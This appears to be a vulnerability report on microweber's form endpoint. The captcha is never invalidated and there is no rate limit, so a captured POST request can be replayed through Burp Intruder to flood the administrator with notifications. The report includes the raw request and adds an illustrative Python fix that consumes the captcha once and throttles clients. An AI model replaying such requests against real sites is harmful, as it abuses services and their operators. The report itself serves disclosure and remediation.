Insufficient Granularity of Access Control in microweber/microweber
Reported on
Mar 6th 2022
Description
There are no rate limits on the form submission endpoint, and a captcha answer is not invalidated once it has been accepted, so the same captcha can be reused to issue notifications to the administrator repeatedly.
Proof of Concept
Capture the newsletter subscription flow in Burp and keep entering an email address and captcha until the POST form request below is captured. Replaying that request in Burp Intruder with the same captcha value issues a new notification on every replay.
Sample Request
POST /demo/api/post_form HTTP/1.1
Host: demo.microweber.org
Cookie: laravel_session=kcTjGuBIPY5gQLMzQ7KLvp0cv0EQQz2nfJEcPKAE; csrf-token-data=%7B%22value%22%3A%22SCWkLefQrigbTe92em37PL4qEBKnLg7ZvVewn60f%22%2C%22expiry%22%3A1646569870269%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demo.microweber.org/demo/forgot_password
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 137
Origin: https://demo.microweber.org
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

_token=SCWkLefQrigbTe92em37PL4qEBKnLg7ZvVewn60f&for_id=footer_newsletter&for=module&email=b%40a.com&module_name=contact_form&captcha=4405
Impact
This vulnerability allows a single captured captcha value to be replayed to issue an arbitrary number of notifications to the administrator.
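As an added illustration of the two missing controls described above (this is example code, not microweber's own code or anything from the original report), the following Python models a form handler in which the captcha answer is consumed on first use and submissions are throttled per client. The `CaptchaStore`, `RateLimiter` and `handle_post_form` names, the session ids and the client addresses are constructed for the example; the captcha value 4405 is the one from the sample request.

```python
import hmac
import time
from collections import defaultdict, deque

class CaptchaStore:
    """One pending captcha answer per session."""
    def __init__(self):
        self._pending = {}  # session_id -> expected answer

    def issue(self, session_id, answer):
        self._pending[session_id] = answer

    def verify_replayable(self, session_id, submitted):
        # Models the reported flaw: the answer is compared but never consumed,
        # so the same captcha value is accepted on every later submission.
        answer = self._pending.get(session_id)
        return answer is not None and hmac.compare_digest(answer, submitted)

    def verify_once(self, session_id, submitted):
        # Hardened check: remove the answer before comparing, so one issued
        # captcha is usable exactly once whether or not the comparison succeeds.
        answer = self._pending.pop(session_id, None)
        return answer is not None and hmac.compare_digest(answer, submitted)

class RateLimiter:
    """Sliding window: at most `limit` requests per `window` seconds per key."""
    def __init__(self, limit, window):
        self.limit, self.window = limit, window
        self._hits = defaultdict(deque)  # key -> timestamps of recent requests

    def allow(self, key, now=None):
        now = time.time() if now is None else now  # injectable for deterministic tests
        hits = self._hits[key]
        while hits and now - hits[0] > self.window:
            hits.popleft()
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True

def handle_post_form(store, limiter, session_id, client_ip, captcha, now=None):
    # Throttle first so failed captcha guesses are limited too; consume the captcha
    # before doing the work, so replaying a captured request cannot re-notify the admin.
    if not limiter.allow(client_ip, now):
        return "rate_limited"
    if not store.verify_once(session_id, captcha):
        return "captcha_rejected"
    return "notification_sent"  # the admin notification would be queued only here
```

In a real Laravel application the per-session answer would live in the session store and the throttle in the cache backend, but the ordering (throttle, then consume, then notify) is the part that matters.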